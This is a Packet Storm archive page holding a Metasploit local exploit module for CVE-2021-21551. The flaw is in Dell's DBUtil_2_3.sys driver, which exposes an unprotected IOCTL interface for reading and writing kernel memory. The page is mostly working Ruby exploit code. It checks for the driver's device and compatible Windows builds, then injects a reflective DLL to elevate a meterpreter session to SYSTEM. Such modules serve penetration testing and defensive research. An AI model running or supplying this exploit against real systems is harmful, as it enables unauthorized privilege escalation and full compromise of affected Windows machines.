what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Dell DBUtil_2_3.sys IOCTL Memory Read / Write

Dell DBUtil_2_3.sys IOCTL Memory Read / Write
Posted May 17, 2021
Authored by Spencer McIntyre, SentinelLabs, Kasif Dekel | Site metasploit.com

The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by an attacker to read and write kernel-mode memory.

tags | exploit, kernel
advisories | CVE-2021-21551
SHA-256 | 60c28ef1ac35891f12da2b7098fca05a34362d8c69f7050055509277585d70ab

Dell DBUtil_2_3.sys IOCTL Memory Read / Write

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking

include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::ReflectiveDLLInjection
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'Dell DBUtil_2_3.sys IOCTL memmove',
'Description' => %q{
The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by
an attacker read and write kernel-mode memory.
},
'License' => MSF_LICENSE,
'Author' => [
'Kasif Dekel', # (from SentinelLabs) blog with detailed analysis
'SentinelLabs', # vulnerability discovery and detailed analysis
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Targets' =>
[
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' =>
{
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2021-21551' ],
[ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
[ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ],
],
'DisclosureDate' => '2021-05-04',
'DefaultTarget' => 0,
'Notes' =>
{
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ]
}
}
)
)
end

def check
sysinfo_value = sysinfo['OS']

if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end

handle = open_device('\\\\.\\dbutil_2_3', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?
return Exploit::CheckCode::Safe
end

session.railgun.kernel32.CloseHandle(handle)
CheckCode::Appears
end

def target_compatible?
sysinfo_value = sysinfo['OS']

build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
vprint_status("Windows Build Number = #{build_num}")

return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)

false
end

def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end

# check that the target is a compatible version of Windows (since the offsets are hardcoded) before loading the RDLL
unless target_compatible?
fail_with(Failure::NoTarget, 'The exploit does not support this target')
end

if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end

encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-21551', 'CVE-2021-21551.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)

print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close